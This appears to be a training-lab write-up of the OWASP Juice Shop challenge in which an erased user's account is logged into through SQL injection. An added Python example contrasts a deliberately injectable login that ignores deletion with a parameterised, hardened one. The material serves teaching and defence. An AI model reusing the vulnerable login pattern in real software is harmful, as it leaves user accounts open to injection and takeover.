Challenge:
Name: GDPR Data Exposure
Description: Log in with Chris’ erased user account
Difficulty: 3 star
Category: Broken Authentication
Expanded Description: https://pwning.owasp-juice.shop/part2/broken-authentication.html
Tools used:
None.
Resources used:
None.
Methodology:
Owing in no small part to the Login Bender challenge solution, after reading the expanded description I was fairly certain that, provided I could find Chris’ account in the user database, I could solve this challenge in the same way, using SQL injection.
![Screenshot of the Users table (19 entries) with columns id, role, email, isActive and password; the row for chris.pike@juice-sh.op is still present among the admin, customer, deluxe and accounting accounts](https://curiositykillscolby.files.wordpress.com/2020/11/image-117.jpeg?w=834)
Chris’ information, fortunately, was still located in the user database, so I implemented my plan.
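As an added example (not code from this write-up or from Juice Shop itself), the Python/sqlite3 sketch below shows the defender's side of this challenge: an in-memory stand-in for the Users table above, a login written the injectable way with no deletion check, and a hardened version that parameterises the query and refuses soft-deleted rows. The deletedAt column, the sample rows and their passwords are assumptions constructed for the demo.

```python
import hashlib
import hmac
import sqlite3
from typing import Optional

# Constructed in-memory stand-in for the Users table in the screenshot above.
# deletedAt is an assumption: a soft-delete marker set by a GDPR "erasure"
# instead of physically removing the row.
SCHEMA = """CREATE TABLE Users (
    id INTEGER PRIMARY KEY, email TEXT UNIQUE NOT NULL, password TEXT NOT NULL,
    role TEXT NOT NULL, isActive INTEGER NOT NULL DEFAULT 1, deletedAt TEXT)"""

def hash_password(plain: str) -> str:
    # Sample-only hashing; a real login should use a slow hash such as bcrypt or Argon2.
    return hashlib.sha256(plain.encode()).hexdigest()

def build_sample_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany(
        "INSERT INTO Users (email, password, role, isActive, deletedAt) VALUES (?, ?, ?, ?, ?)",
        [("admin@juice-sh.op", hash_password("admin-pw"), "admin", 1, None),
         # Chris' account: "erased", yet the row and its password hash are still present.
         ("chris.pike@juice-sh.op", hash_password("chris-pw"), "customer", 1, "2020-11-01T00:00:00Z")],
    )
    return conn

def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> Optional[str]:
    # Anti-pattern: user input concatenated into SQL and no deletedAt filter,
    # so an erased account still authenticates and a quote in the input alters the query.
    sql = ("SELECT email FROM Users WHERE email = '" + email
           + "' AND password = '" + hash_password(password) + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_hardened(conn: sqlite3.Connection, email: str, password: str) -> Optional[str]:
    # Parameterised lookup (input cannot change the query structure) that only
    # considers live accounts; the hash comparison is constant-time.
    row = conn.execute(
        "SELECT email, password FROM Users WHERE email = ? AND isActive = 1 AND deletedAt IS NULL",
        (email,),
    ).fetchone()
    if row is None or not hmac.compare_digest(row[1], hash_password(password)):
        return None
    return row[0]
```

A login attempt that matches a soft-deleted row is also worth logging separately, since a request for an account the owner asked to erase is a useful detection signal in its own right.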


Prevention and Mitigation Strategies:
OWASP User Privacy Cheat Sheet
Lessons Learned and Things Worth Mentioning:
Nothing, really. I’d already learned this trick completing Login Bender.